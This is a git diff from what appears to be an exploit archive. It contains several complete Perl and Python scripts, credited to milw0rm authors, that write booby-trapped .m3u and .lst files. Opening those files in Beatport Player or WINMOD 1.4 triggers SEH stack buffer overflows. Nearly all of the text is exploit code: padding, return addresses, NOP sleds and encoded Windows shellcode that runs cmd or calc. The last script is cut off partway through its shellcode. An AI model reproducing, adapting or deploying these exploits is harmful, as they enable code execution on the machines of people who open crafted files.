@@ -1,29 +1,29 @@ - #!/usr/bin/perl -# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH) -# Work Only in WIN SP2 FR -# Credit to SirGod The Discover -# Stack The exploiter -# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d -# After exec the exploit wait some sec for see the cmd executed :d -use strict; -use warnings; -# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078 -my $shellcode = -"\x8B\xEC\x33\xFF\x57". -"\xC6\x45\xFC\x63\xC6\x45". -"\xFD\x6D\xC6\x45\xFE\x64". -"\xC6\x45\xF8\x01\x8D". -"\x45\xFC\x50\xB8\xC7\x93". -"\xBF\x77\xFF\xD0"; -my $junk = "\x41" x 1232; -my $next_seh="\xeb\x06\x90\x90"; -my $seh = "\x44\x25\xD1\x72"; # -my $nops = "\x90" x 4; -my $nopsled = "\x90" x 20; -open(my $playlist, "> seh_exploit.m3u"); -print $playlist - $junk.$next_seh.$seh.$nops.$shellcode.$nopsled. - "\r\n"; -close $playlist; - -# milw0rm.com [2009-05-01] + #!/usr/bin/perl +# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH) +# Work Only in WIN SP2 FR +# Credit to SirGod The Discover +# Stack The exploiter +# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d +# After exec the exploit wait some sec for see the cmd executed :d +use strict; +use warnings; +# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078 +my $shellcode = +"\x8B\xEC\x33\xFF\x57". +"\xC6\x45\xFC\x63\xC6\x45". +"\xFD\x6D\xC6\x45\xFE\x64". +"\xC6\x45\xF8\x01\x8D". +"\x45\xFC\x50\xB8\xC7\x93". +"\xBF\x77\xFF\xD0"; +my $junk = "\x41" x 1232; +my $next_seh="\xeb\x06\x90\x90"; +my $seh = "\x44\x25\xD1\x72"; # +my $nops = "\x90" x 4; +my $nopsled = "\x90" x 20; +open(my $playlist, "> seh_exploit.m3u"); +print $playlist + $junk.$next_seh.$seh.$nops.$shellcode.$nopsled. + "\r\n"; +close $playlist; + +# milw0rm.com [2009-05-01] 
diff --git a/platforms/windows/local/9221.pl b/platforms/windows/local/9221.pl index cbc93d91c..89314f1b3 100755 --- a/platforms/windows/local/9221.pl +++ b/platforms/windows/local/9221.pl 
@@ -1,44 +1,44 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH) -##http://www.software112.com/products/winmod+download.html -# ## easy ## -# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7 -## this work sooooooooo good -## Tested on: Windows XP Pro SP2 (EN) -################################################################## -my $bof="\x41" x 2880; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\x8c\x29\xd3\x74";##EVIL RET -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.LST'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-07-21] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH) +##http://www.software112.com/products/winmod+download.html +# ## easy ## +# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7 +## this work sooooooooo good +## Tested on: Windows XP Pro SP2 (EN) +################################################################## +my $bof="\x41" x 2880; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x8c\x29\xd3\x74";##EVIL RET +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". 
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.LST'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-07-21] diff --git a/platforms/windows/local/9229.py b/platforms/windows/local/9229.py index ad6bb80ec..98debf540 100755 --- a/platforms/windows/local/9229.py +++ b/platforms/windows/local/9229.py 
@@ -1,49 +1,49 @@ -#!/usr/bin/python -#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) -#[*] Tested on : Xp sp2 fr -#[*] Original exploit : http://www.milw0rm.com/exploits/9221 -#[*] By : Dz_Girl -#[*] Greets to : hisok4 (even if he doesn't know me) & all friends - - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41" -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59" -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c" -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45" -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66" -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f" -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59" -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a" -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44" -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77" -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a" -"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b" -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57" -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f" -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73" -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39" -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45" -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45" -"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41") - -payload = "DZ" -payload += shellcode -payload += "\x41"*(2868-len(shellcode)) -payload += "\xE9\xC7\xF4\xFF\xFF" -payload += "\x61"*5 -payload += "\xEB\xF4\x41\x41" -payload += "\x1E\x2F\x40\x00" - 
-try: - out_file = open("exploit.lst","w") - out_file.write(payload) - out_file.close() - print("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-07-22] +#!/usr/bin/python +#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) +#[*] Tested on : Xp sp2 fr +#[*] Original exploit : http://www.milw0rm.com/exploits/9221 +#[*] By : Dz_Girl +#[*] Greets to : hisok4 (even if he doesn't know me) & all friends + + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41" +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59" +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c" +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45" +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66" +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f" +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59" +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a" +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44" +"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77" +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a" +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b" +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57" +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f" +"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73" +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39" +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45" +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45" +"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41") + +payload = "DZ" +payload += 
shellcode +payload += "\x41"*(2868-len(shellcode)) +payload += "\xE9\xC7\xF4\xFF\xFF" +payload += "\x61"*5 +payload += "\xEB\xF4\x41\x41" +payload += "\x1E\x2F\x40\x00" + +try: + out_file = open("exploit.lst","w") + out_file.write(payload) + out_file.close() + print("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-07-22] diff --git a/platforms/windows/local/9234.pl b/platforms/windows/local/9234.pl index f290f7750..e66f70dc5 100755 --- a/platforms/windows/local/9234.pl +++ b/platforms/windows/local/9234.pl 
@@ -1,70 +1,70 @@ -#!/usr/bin/perl -# -# Winmod 1.4 (.lst) Local Stack Overflow Exploit -# Exploit by CWH Underground -# Tested on Win XP SP2 EN -# -# Download: http://www.software112.com/products/winmod+download.html -# - -print "\n==================================================\n"; -print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n"; -print " \n"; -print " Discovered By CWH Underground \n"; -print "==================================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - -## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". 
-"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". -"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; - -my $buf="\x41" x 500; -$buf = $buf."\x68\xD5\x85\x7C"; -$buf = $buf.("\x90" x 12); -$buf = $buf.$shellcode; -$buf = $buf."\x2E".("\x41"x9); - -open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n"); -print FILE $buf; -close (FILE); - -print "[+] Create exploit file successful\n"; -print "[+] File's name is cwh_xpl.lst\n"; - -##################################################################### -#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2009-07-23] +#!/usr/bin/perl +# +# Winmod 1.4 (.lst) Local Stack Overflow Exploit +# Exploit by CWH Underground +# Tested on Win XP SP2 EN +# +# Download: http://www.software112.com/products/winmod+download.html +# + +print "\n==================================================\n"; +print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n"; +print " \n"; +print " Discovered By CWH Underground \n"; +print "==================================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; 
+print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + +## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". +"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". +"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". 
+"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; + +my $buf="\x41" x 500; +$buf = $buf."\x68\xD5\x85\x7C"; +$buf = $buf.("\x90" x 12); +$buf = $buf.$shellcode; +$buf = $buf."\x2E".("\x41"x9); + +open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n"); +print FILE $buf; +close (FILE); + +print "[+] Create exploit file successful\n"; +print "[+] File's name is cwh_xpl.lst\n"; + +##################################################################### +#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2009-07-23] diff --git a/platforms/windows/local/9299.pl b/platforms/windows/local/9299.pl index e60083a52..6b16d75a8 100755 --- a/platforms/windows/local/9299.pl +++ b/platforms/windows/local/9299.pl 
@@ -1,53 +1,53 @@ -# -# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH) -# http://www.software112.com/products/winmod+download.html -# -# Exploit for Windows XP SP3 (en) -# -# by corelan - c0d3r -# Greetings to Saumil and SK -# - -my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst"; - -my $buf="\x41" x 500; -$buf=$buf.pack('V',0x76B2D577); -$buf=$buf."\x41" x (2880-500); -my $nseh = "\xEB\x06\x90\x90"; -my $seh=pack('V',0x7C972ECD); -my $nop = "\x90" x 20; -## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". -"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". 
-"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; - -$buf = $buf.$nseh.$seh.$nop.$shellcode; - -print "[+] Writing exploit file \n"; -open(FILE,'>$sploitfile'); -print FILE $buf; -close (FILE); -print "[+] Exploit file written : $sploitfile\n"; - - -print "[+] File's name is xpl_sp3.lst\n"; - -# milw0rm.com [2009-07-28] +# +# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH) +# http://www.software112.com/products/winmod+download.html +# +# Exploit for Windows XP SP3 (en) +# +# by corelan - c0d3r +# Greetings to Saumil and SK +# + +my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst"; + +my $buf="\x41" x 500; +$buf=$buf.pack('V',0x76B2D577); +$buf=$buf."\x41" x (2880-500); +my $nseh = "\xEB\x06\x90\x90"; +my $seh=pack('V',0x7C972ECD); +my $nop = "\x90" x 20; +## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". +"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". 
